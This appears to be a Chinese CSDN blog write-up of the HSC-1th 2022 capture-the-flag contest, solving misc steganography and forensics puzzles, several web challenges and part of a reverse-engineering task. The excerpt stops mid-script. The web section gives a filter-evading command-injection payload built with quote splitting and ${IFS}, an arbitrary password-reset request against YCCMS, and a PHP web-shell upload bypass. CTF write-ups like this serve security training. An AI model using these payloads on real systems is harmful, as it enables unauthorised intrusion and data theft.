HSC-1th 2022 48h大赛 write-up

本文是关于HSC-1th 2022 48小时安全挑战赛的Write-up,涵盖了Misc、Web、Reverse、Crypto和Pwn等领域的题目,包括密码破解、图像处理、Wireshark分析、安卓逆向、希尔密码等解题过程,展示了选手在比赛中的思路和技巧。
摘要由CSDN通过智能技术生成

HSC-1th大赛-Writeup

比赛是一月份的,整理了下writeup,CSDN上也发一下份吧。
请添加图片描述

MISC

0x01 Sign-in

前往红客突击队公众号发送“HSC2019”并签到吧!
请添加图片描述

0x02 DORAEMON

下载后doraemon.zip,压缩软件打开有提示:哆啦A梦把泡好的QR放进口袋后,用六位数字把自己放好了。你能找到它吗?

用Advanced Archive Password Recovery爆破得到6为数字密码:376852
请添加图片描述
解压后得到一张哆啦A梦的图片,根据提示利用tweakpng软件修改高度,得到一张缺角的二维码,补齐:
请添加图片描述
扫描得到flag:flag{sing1emak3r10v3m!sc}

0x03 汝闻,人言否

下载得到attach.zip,解压的到图片:汝闻,人言否.png,用010editor打开,发现png尾后面有追加数据,而且是KP开头,提取出来修改一下得到压缩包。
请添加图片描述
压缩包发现有密码,提示为一段字符串:qazsedcftrfvgycft6yhntgbnytfvbhyik,.;p,根据经验应该是键盘密码,得到解压密码WVALOU,得到flag文件,文件头是RIFF,修改后缀为wav。

audacity.exe打开查看频谱得到flag:
请添加图片描述

0x04 PERFORMANCE-ART

下载后为Performance_art.zip,解压后为一张图片:
请添加图片描述
百度银河语言,翻译过来为50 4B开头的二进制,生成压缩包后解压的到:ZmxhZ3tnNUEwIWkyZjF9
请添加图片描述

0x05 WIRESHARK

下载是wireshark.zip,打开发现需要密码,直接用010 editor查看,发现文件尾是png图片,提取出png:
请添加图片描述
尝试Wireshark密码不对,利用stegsolve查看lsb信息,发现隐藏另外一张png图片,提取出来得到一张二维码:
请添加图片描述
扫描得到wrsak…iehr370,明显是栅栏密码,得到解压密码wireshark3.7.0,解压后得到wireshark文件,发现结尾是pdf特征,补pdf头。得到pdf文件,利用wbstego得到flag

flag{Go0dJ0B_y0ufIndLt}

0x06 PCXP

下载下来raw镜像,magent AXIOM分析,经过排查找到一些可能比较特殊的文件名,以及一些其他的信息:
请添加图片描述
请添加图片描述
请添加图片描述
使用volatility成功提取并正常打开的文件如下(rar -> flag.rar,mirror1.rar文件更小, 两个mirror都包含mirror.png文件):
请添加图片描述
可以看到mirror1.rar的解压密码:key:mirror,mirror2.rar用密码打不开,暂时不管。
请添加图片描述
解压后的到png图片,lsb隐写,提取:zsteg -E “extradata:0” mirror.png > mirror1:
请添加图片描述
发现png尾,二进制反转代码得到png图片:

with open('mirror1','rb') as f:
   with open('mirror1.png', 'wb') as g:
      g.write(f.read()[::-1])

得到压缩密码:HSC-1th202248H,解压缩后得到secret.pcap,以为是usb鼠标或者键盘流量,结果foremost直接分离出两张图片,尺寸大小一样,直接盲水印得到flag:
请添加图片描述
请添加图片描述
flag{Wat3rMarkPtysc}

Web

0x01 CLICK

前端验证,直接查看/static/main.js文件,发现base64字符串,解密得到flag{be92495e-b0b4-46dd-af33-90b10af858eb}
请添加图片描述

0x02 Web-sign in

打开提示你知道robots协议吗?直接查看robots.txt
请添加图片描述
访问fiag_ls_h3re.php,发现f12和右键均被禁用,那就直接在打开页面之前打开f12,得到flag。
请添加图片描述

0x03 EXEC

命令执行发现过滤了很多关键字
请添加图片描述
exp:?cmd=l’'s${IFS}/>/var/www/html/a,再访问a,得到ctf_is_fun_flag2021文件,

再构造?cmd=n’‘l${IFS}/ctf_is_fun_fl’'ag2021>/var/www/html/a得到flag:flag{4449e8e6-ceec-4fc0-9d38-64559dd5197f}

0x04 CMS SYSTEM

打开网站,直接添加admin发现后台,发现是YCCMS,访问www.zip发现源码。

通过检索发现YCCMS存在任意密码重置漏洞,相关poc参考下文。

https://www.cnblogs.com/0daybug/p/12932677.html

登陆后抓包修改参数 a=admin&m=update,POST 传入:
username=admin&password=admin&notpassword=admin&send=%E4%BF%AE%E6%94%B9%E5%AF%86%E7%A0%81
请添加图片描述
后台存在文件上传漏洞:

https://blog.csdn.net/qq_43233085/article/details/105447576
请添加图片描述
LogoUpload.class.php 中发现会将文件重命名,并且后缀可控,直接修改为shell.png.php,上传后访问view/index/images/logo.php,显示文件存在,直接利用读取flag
请添加图片描述

REVERSE

0x01 hiahia o()┛**

下载文件Aha.exe,拖入ida搜索字符串,发现Aha, Well done!
请添加图片描述请添加图片描述

res="igdb~Mumu@p&>%;%<$<p"
flag=""
for i in range(len(res)):
    if i>9:
        if i%2==1:
            flag+=chr(ord(res[i])+13)
        else:
            flag+=chr(ord(res[i])-11)
    else:
        if i%2==1:
            flag+=chr(ord(res[i])+5)
        else:
            flag+=chr
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值